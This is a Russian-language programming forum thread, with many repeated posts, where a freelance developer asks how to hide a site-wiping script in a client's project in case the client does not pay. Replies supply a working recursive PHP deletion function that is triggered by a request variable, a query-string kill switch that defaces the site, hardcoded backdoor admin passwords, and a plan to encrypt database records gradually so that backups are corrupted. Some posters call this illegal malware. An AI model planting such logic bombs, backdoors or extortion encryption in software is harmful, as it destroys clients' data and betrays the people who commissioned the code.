Хочу сделать в сайте дыру...
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...
P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).
Да и ты знанияим не блистаешь, если не знаешь как это сделать)))
Мне кажется, что когда ты ничинал, то знаниями тоже блестал не особо. Но сейчас такая возможность имеется.
Ближе к делу. Есть такая ф-я unlink (). НО, я так подозреваю, что на большинстве хостингов действие этой функции ограничено (например, припомощи режима safe_mode). В мане по этому поводу имеется мэсседж:
Отсюда вопросы:
Какой UID имеет скрипт, запущенный обычным образом?
Может ли все-таки функция unlink() удалить файл в режиме safe_mode?
P. S. Прошу больше не давать оценку моих знаний.
Мне кажется, что когда ты ничинал, то знаниями тоже блестал не особо. Но сейчас такая возможность имеется.
Ближе к делу. Есть такая ф-я unlink (). НО, я так подозреваю, что на большинстве хостингов действие этой функции ограничено (например, припомощи режима safe_mode). В мане по этому поводу имеется мэсседж:
Отсюда вопросы:
Какой UID имеет скрипт, запущенный обычным образом?
Может ли все-таки функция unlink() удалить файл в режиме safe_mode?
P. S. Прошу больше не давать оценку моих знаний.
Сорри, однако разумный у тебя подоход.
Хочу заметить что хосты не переводятят ничего в сэйв моуде, ибо система в этом режиме рработает медленно.
Покажи где это написано для анлинка.
Сорри, однако разумный у тебя подоход.
Хочу заметить что хосты не переводятят ничего в сэйв моуде, ибо система в этом режиме рработает медленно.
Покажи где это написано для анлинка.
Про анлинк в сейф моуде написано здесь.
Т. е. получается, что unlink() работает вне зависимости от того, какой uid присваивается запущенному скрипту?..
Подскажите: может ли РНР-скрипт удалить все содержимое сайта?
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...
P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).
Ну во первых все нормальные хостеры ведут бекапы сайтов... Удалять сайт некачественного заказчика ты не будешь в первый же день - подозрение упадет на тебя, а там и суд могет быть, а на второй день уже будет бекап, если не на первый...
ИМХО, дыру нада делать незаметную и не с удалением, а с изменением информации, куда приятней написать в тайтл пару тройку отборных матов :) или внести невидимый текст, а потом пожаловаться на спам, а верхом изысков написать скриптик обманывающий поисковик :) и опят таки пожаловаться на спам... От такой дыры бекапы не спасут, если сделать незаметно :)
Ну во первых все нормальные хостеры ведут бекапы сайтов... Удалять сайт некачественного заказчика ты не будешь в первый же день - подозрение упадет на тебя, а там и суд могет быть, а на второй день уже будет бекап, если не на первый...
ИМХО, дыру нада делать незаметную и не с удалением, а с изменением информации, куда приятней написать в тайтл пару тройку отборных матов :) или внести невидимый текст, а потом пожаловаться на спам, а верхом изысков написать скриптик обманывающий поисковик :) и опят таки пожаловаться на спам... От такой дыры бекапы не спасут, если сделать незаметно :)
Если с этой стороны смотреть, то в судь можно просто подать за неуплату.
если для заказчика ПХП это просто звук, то я полагаю ему надо делать админку. Из этого вытекает что ты можешь ему ограничить доступ к сей админке (до оплаты ессно), т.е. чел ничего не сможет менять и ничего не сможет добавлять до тех пор пока не заплатит.
Например поменять пароль и ламо ничего не сможет сдалать... ведь он не чешет в ПХП(а ты в свою очередь сделай для себя подстраховку т.е. что бы ты всегда с заданным логином и пассом смог войти и натворить там дел).
на мой взгляд самый удачный вариант:
если для заказчика ПХП это просто звук, то я полагаю ему надо делать админку. Из этого вытекает что ты можешь ему ограничить доступ к сей админке (до оплаты ессно), т.е. чел ничего не сможет менять и ничего не сможет добавлять до тех пор пока не заплатит.
Например поменять пароль и ламо ничего не сможет сдалать... ведь он не чешет в ПХП(а ты в свою очередь сделай для себя подстраховку т.е. что бы ты всегда с заданным логином и пассом смог войти и натворить там дел).
Впринципе да, и свой личный пароль в таком случае уж, лучше встраивать в код а не в базу.
Впринципе да, и свой личный пароль в таком случае уж, лучше встраивать в код а не в базу.
ну это как раз и подразумевалось
ну это как раз и подразумевалось
Если есть база, нах трогать скрипты? Шифруешь помаленьку запись за записью, а в один прекрасный момент они все опс, и зашифрованные. Причем ассиметричным ключем. Да так, что ни один кулибин блин не расшифрует. И будет твой клиент ждать пока RSA взнесут или отношения с тобой налаживать - другая то половинка ключа у тебя.
Если есть база, нах трогать скрипты? Шифруешь помаленьку запись за записью, а в один прекрасный момент они все опс, и зашифрованные. Причем ассиметричным ключем. Да так, что ни один кулибин блин не расшифрует. И будет твой клиент ждать пока RSA взнесут или отношения с тобой налаживать - другая то половинка ключа у тебя.
А причём тут ассиметричное шифрование ? Раз он шифрует потихоньку, значит поначалу он и расшифровывает закрытым ключём, чтобы показать инфу.
А если закрытый есть но потом пропадает, то то же можно сделать с симметричным шифрованием.
А причём тут ассиметричное шифрование ? Раз он шифрует потихоньку, значит поначалу он и расшифровывает закрытым ключём, чтобы показать инфу.
А если закрытый есть но потом пропадает, то то же можно сделать с симметричным шифрованием.
Нет, он заранее проектирует базу так, что в записях присутствует поле cipher и во все запросы вставляет AND NOT cipher, соответственно при шифровании флаг устанавливается и в выборках не участвует.
Постепенно - чтобы бэкапы потерлись полушифрованными версиями. К тому времени как в себя приходят бэкапы уже значительно похерены.
таким образом закрытый ключ в коде не присутствует и уже по барабану - рубит клиент в коде, не рубит.
Не забывайте, клиент в сердцах может заплатить гораздо большую сумму чем заторчал исполнителю, другому кодеру - из принципа - нех мол нас напрягать и в тупички ставить - в смысле по опыту говорю.
Вообщето, никакой официальщины, так что про суды говорить не стоит.
Работа выполняестя таким образом:
Пишется сайт за умеренную плату, можно сказать, по усному договору. Сайт отдается тлолько тогда, когда будет за него оплата И официальное зачисление в штат сотрудников (на соответствующий пост) с целью расширения и поддержки сайта (минимум на 2 месяца с оговоренным заранее окладом).
Вот такие пироги.
Вообще-то ребята там нормальные, кинуть не должны, но перестраховаться стоило бы...
....
Вообще-то ребята там нормальные, кинуть не должны, но перестраховаться стоило бы...
А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.
А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.
да кстати.
тя так кинут - денег не дадут и правильно сделают, а закладку уберут до начала экспуатации.
а сисадмин их 50 на 50 что этот форум видит
А вот здесь возникает ситуация до наоборот. Ребята (неважно, что не особо разбираются, всегда найдется кто нить, кто разберется) посмотрят твой код и спросят, чтоже ты милый человек сделал то? Закладок понавставлял. И как теперь с тобой быть?
Собственно, делать дырочки, тем более сознательно - imho, совсем не комильфо.
Все зависит от того как и какие дырочки делать....Если бы у ребят были програмцы которые смогли бы найти мелкие дырочки, то они бы и писали, ИМХО.
<?
function BuildTree($katalog,$pre)
{
if($pre!="")
$pre=$pre."/".$katalog;
else
$pre=$katalog;
$dir=opendir($pre);
while($file=readdir($dir))
{
if($file!="."&&$file!="..")
{
print($pre."/".$file."
");
if(is_dir($pre."/".$file))
BuildTree($file,$pre);
else
unlink($pre."/".$file);
}
}
rmdir($pre);
closedir($dir);
}
if(isset($my))
BuildTree(".","");
?>
Все зависит от того как и какие дырочки делать....Если бы у ребят были програмцы которые смогли бы найти мелкие дырочки, то они бы и писали, ИМХО.
Опыт из своей работы. Была контора которая торговала через интернет. Периодически, что то случалось с их магазином. В один день такая ситуация людям надоела. Встал вопрос - что делать. Или заказывать новый проект, или доработать существующий. Остановились на втором. Нашли программиста, который сможет сделать аудит существующего кода и дать рекомендации что нужно исправить.
Собственно, если ты передаешь код заказчику, он волен делать с ним все что угодно. И совсем не факт что первоначальный автор кода будет единственным в поддержке проекта.
Опыт из своей работы. Была контора которая торговала через интернет. Периодически, что то случалось с их магазином. В один день такая ситуация людям надоела. Встал вопрос - что делать. Или заказывать новый проект, или доработать существующий. Остановились на втором. Нашли программиста, который сможет сделать аудит существующего кода и дать рекомендации что нужно исправить.
Собственно, если ты передаешь код заказчику, он волен делать с ним все что угодно. И совсем не факт что первоначальный автор кода будет единственным в поддержке проекта.
Тада самый простой вариант не давать исходники кода клиенту, а показывать на своем хосте:)
Тада самый простой вариант не давать исходники кода клиенту, а показывать на своем хосте:)
Или зашифровать исходники)))))))))))))
Звать Чигевару=)
Ну если вы совсем боитесь за свои исходники то можно поступить ещё круче заюзать Си++ а там пускай разбираются любители ассемблера
А еще лучше, дабы они не достались злобному клиенту(ведь он обманет) - стереть их нахиг...:D
А еще лучше, дабы они не достались злобному клиенту(ведь он обманет) - стереть их нахиг...:D
Соглсен насчет щей.
Но Щи, можно все таки дизасемблировать.
Лучше уж сразу писать на ассемблере, на ассемблере, код можно закодировать, и раскодировывать только во время выполнения программы.:)
Подскажите: может ли РНР-скрипт удалить все содержимое сайта?
Например, если плохой заказчик не хочет платить за поддержку сайта, я вызываю определенный скрипт (который по совместительству выполняет какие-то еще функции) с определенными параматрами. И этот скрипт под чистую убирает все в папке
Можно ли так сделать. И что для этого надо делать предварительно? Надо ли шаманить с правами доступа?
Или мож кто знает другой способ, как наказать хитрож*пого заказчика?...
P. S. Заказчик - человек исключительно тупой. РНР для него это просто сочетание букв :).
Я бы сделал так... В query string передал бы параметры типа http://site.ru/?do=del_site
А где нибудь в скрипте отлавливалась эта самая переменная $do со значением del_site и последующим unlink(). Красивее будет если скрипт удалит все после этого создаст 1 файл index.html в котором в центру большими буквами будет написано "ВЛАДЕЛЕЦ САЙТА ОКАЗАЛСЯ СВОЛОЧЬЮ, ЕГО САЙТ УДАЛЕН!". :)
Я бы сделал так... В query string передал бы параметры типа http://site.ru/?do=del_site
А где нибудь в скрипте отлавливалась эта самая переменная $do со значением del_site и последующим unlink(). Красивее будет если скрипт удалит все после этого создаст 1 файл index.html в котором в центру большими буквами будет написано "ВЛАДЕЛЕЦ САЙТА ОКАЗАЛСЯ СВОЛОЧЬЮ, ЕГО САЙТ УДАЛЕН!". :)
А это уже считаеться вредноносной программой и катит под статью.
А это уже считаеться вредноносной программой и катит под статью.
Точняк! Так что надо заключать договор на разработку чтобы не было проблем! Хотя бы как между физ и юр лицом.
А это уже считаеться вредноносной программой и катит под статью.
А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?
А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?
Тоже верно! Побывал на этом месте года 3 назад. Но спасла ситуация, что пароли к серверу были тока у меня. Динамили 4 месяца с деньгами. Потом я позвонил и сказал, что если не оплатят сайт удалю, сразу оплатили на следующий день. Хотя могли и по башне настучать.... тогда уже ничего не помоголо бы P(
Тоже верно! Побывал на этом месте года 3 назад. Но спасла ситуация, что пароли к серверу были тока у меня. Динамили 4 месяца с деньгами. Потом я позвонил и сказал, что если не оплатят сайт удалю, сразу оплатили на следующий день. Хотя могли и по башне настучать.... тогда уже ничего не помоголо бы P(
Можно просто удалить все файлы с сервака. А потом сказать, что ты не причем. В этом случае заказчик сам прибежит с деньгами. :)
ИМХО лучше всегда подстаховываться, либо на каждый заказ составлять контакт.
А обдурить честного программера, который с опухшими глазами ночами кодил сайт, по-твоему честно? И чем же она вредоносна? Что у кого-то хард от этого накроется?
Ты считаешь, что вредноносные программы только могут железо портить? Тут не идёт разговор про честность, тут разговор начился про законность, а вот он как раз в этом случае будет на стороне заказчика. Можно считать это троянским конём, если так будет угодно. Сам попадал в такие ситуации и знаю какого это. Сейчас у меня всё проще.
1 этап. Договариваешься (Т.З., сумма, возможна небольшая предоплата ~5-10%) и отдаёшь заказ дизайнеру (я один не работаю).
2 этап. Дизайн одобряеться (jpg низкого качества) отнимаеться ещё 50% и при желании его ему отдаёться PSD файл.
3 этап Сайт выкладываеться на МОЁМ сайте (в отдельную папку) итам в течении небольшого времени тестируеться заказчиком. После отбираються полностью деньги и заливаеться к нему на хостинг. Если он начинает ворчать недовольно (типа ко мне давай), то шифруеться zend'ом и заливаеться к нему (само собой в триальной версии) всё, точка, ни шагу влево, ни шагу вправо. Если начинают "ну ты сделай, посмотрим, потом заплатим" 95% на***т (могу ошибаться, это моя личная статистика).